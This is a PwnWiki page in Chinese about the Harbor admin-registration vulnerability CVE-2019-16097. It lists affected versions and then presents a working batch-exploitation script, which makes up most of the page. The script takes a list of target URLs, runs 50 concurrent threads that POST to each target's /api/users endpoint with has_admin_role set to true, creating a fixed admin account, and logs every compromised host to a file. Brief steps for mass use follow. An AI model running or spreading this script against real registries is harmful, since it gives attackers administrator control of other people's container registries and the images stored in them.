Harbor 任意管理員註冊漏洞

From PwnWiki
Revision as of 14:02, 20 April 2021 by Pwnwiki (talk | contribs) (Created page with "==影響版本== Harbor 1.7.0版本至1.8.2版本 ==不受影響版本== Harbor>= 1.7.6 Harbor>= 1.8.3 ==批量利用POC== <pre> import requests import threading import log...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

影響版本

Harbor 1.7.0版本至1.8.2版本

不受影響版本

Harbor>= 1.7.6

Harbor>= 1.8.3

批量利用POC

import requests
import threading
import logging

data='{"username":"biubiubiu","email":"[email protected]","realname":"biubiu1biu","password":"Aa111111","comment":"biubiubiu","has_admin_role":true}'

headers={"Content-Type": "application/json"}

def poc(url):
    pwn_url=url+"/api/users"
    payload=data
    try:
        r=requests.post(pwn_url, data=payload,headers=headers,timeout=10)
        print(pwn_url)
        print(r.status_code)
        if r.status_code == 201:
            print("\n\n you has created a user,username=biubiubiu,password=Aa111111")
            f.write(url+"       The URL has created a user,username=biubiubiu,password=Aa111111")
        else:
            print("The vulnerability does not exist on the website or the account name has been written")

    except Exception as e:
        logging.warning(pwn_url)
        print(e)

if __name__ == '__main__':
    print ("this is a CVE-2019-16097 poc")
    print("more cve-2019-16097 info welcome to https://www.lstazl.com")
    f=open("results.txt","a")
    url_list=[i.replace("\n","") for i in open("urls.txt","r").readlines()]
    for url in url_list:
        threading.Thread(target=poc,args=(url,)).start()
        while 1:
            if (len(threading.enumerate())<50):
                break


1.在urls.txt中添加你要檢測的url

2.python3環境下運行cve-2019-16097腳本 python3 cve-2019-16097.py

3.批量檢測完成後再results中查看成功寫入賬號的url。

Retrieved from "https://pwnwiki.com/index.php?title=Harbor_任意管理員註冊漏洞&oldid=1769"